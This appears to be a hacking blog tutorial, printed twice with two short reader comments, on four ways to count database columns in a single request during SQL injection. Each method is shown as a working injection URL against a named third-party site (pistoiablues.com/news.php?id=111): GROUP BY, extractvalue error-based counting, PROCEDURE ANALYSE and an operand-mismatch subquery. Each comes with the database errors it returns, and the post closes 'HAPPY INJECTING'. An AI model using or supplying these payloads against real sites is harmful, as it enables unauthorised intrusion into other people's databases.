In this Tutorial I'm Going To Discuss On How many There are Ways for Counting All Columns At one Request.Simply we use ORDER BY Command For Counting Columns One By One and It take Time But All The Time we are looking for Easy Ways.So This Guide Will Help You In That Case.
I will Tell You Guys Some Best Ways Which Will Help you in Counting Columns.
This Method Is Very Simple. We Have To Build Our GROUP BY Command For Counting Columns At One Request.We will Give a large Numbered Values with GROUP BY and When we Execute Our Command it will Return Total Columns.
For Example,
http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +
And this Command Will Return Total Number Of Columns.
Unknown column '9' in 'group statement'
so there are 8 Total Number of Columns.
I Will Use XPATH Injection With Extractvalue.
For Example,
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
Replace TABLE_NAME_HERE with any one Table Name From the Database and Execute this Command .It will Return Total Number of Columns from The Database.
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='news' and table_schema=database())))--+
XPATH syntax error:':8'
so it Means There are 8 Total Number of Columns.
http://www.pistoiablues.com/news.php?id=111' Procedure Analyse()--+
Here we Didn't Get Any kind of Error.But if we Notice the Web Page we Can See there are 8 Slashes .So it means Total Number of Columns Are 8.
Product.php?id=
Page.php?id=
News.php?id=
This Command works behind The SQL Query which is in the PHP CODING that Script.
For Example , We Gave Command For Counting The Columns.
News.php?id=2 order by 3
So the Query which works behind is
SELECT * FROM NEWS WHERE ID=2
We will Use those Tables for Preparing Our Columns Count Command.
http://www.pistoiablues.com/news.php?id=111' and (select * from news)=(select 0)--+
And we got Total Number of Columns are 8.
Operand should contain 8 column(s)
These are Easy and simple ways For Counting Total Number of Columns At one Request and Will Help you guys while injecting.
HAPPY INJECTING !!
AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee
I will Tell You Guys Some Best Ways Which Will Help you in Counting Columns.
METHOD 1
Using GROUP BY
This Method Is Known To Some people But I'm going To Cover it also For Newbies.This Method Is Very Simple. We Have To Build Our GROUP BY Command For Counting Columns At One Request.We will Give a large Numbered Values with GROUP BY and When we Execute Our Command it will Return Total Columns.
For Example,
http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +
And this Command Will Return Total Number Of Columns.
Unknown column '9' in 'group statement'
so there are 8 Total Number of Columns.
METHOD 2
Using COUNT Function
In this Method we will use COUNT Function for Counting The Total Number Of Columns.We will Use Count Function with XPATH or Error Based Injection.And We Have to Also Guess One Table Name for Counting All Valid Columns from the Database.I Will Use XPATH Injection With Extractvalue.
For Example,
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
Replace TABLE_NAME_HERE with any one Table Name From the Database and Execute this Command .It will Return Total Number of Columns from The Database.
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='news' and table_schema=database())))--+
XPATH syntax error:':8'
so it Means There are 8 Total Number of Columns.
METHOD 3
USING PROCEDURE ANALYSE Function
Just Few People Knows This Method .We Will Use PROCEDURE ANALYSE Function In this Method For Counting Total Number of Columns.This Function Works really Amazing.We will just Execute this Command And see the Response from the Target Site.http://www.pistoiablues.com/news.php?id=111' Procedure Analyse()--+
Here we Didn't Get Any kind of Error.But if we Notice the Web Page we Can See there are 8 Slashes .So it means Total Number of Columns Are 8.
METHOD 4
Using URL Tables
In This Method we will Count Total Number of Columns through The Tables which were in our Target URL. For Example.Product.php?id=
Page.php?id=
News.php?id=
This Command works behind The SQL Query which is in the PHP CODING that Script.
For Example , We Gave Command For Counting The Columns.
News.php?id=2 order by 3
So the Query which works behind is
SELECT * FROM NEWS WHERE ID=2
We will Use those Tables for Preparing Our Columns Count Command.
http://www.pistoiablues.com/news.php?id=111' and (select * from news)=(select 0)--+
And we got Total Number of Columns are 8.
Operand should contain 8 column(s)
These are Easy and simple ways For Counting Total Number of Columns At one Request and Will Help you guys while injecting.
HAPPY INJECTING !!
AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee
Good One :)
ReplyDeletethnks.
Delete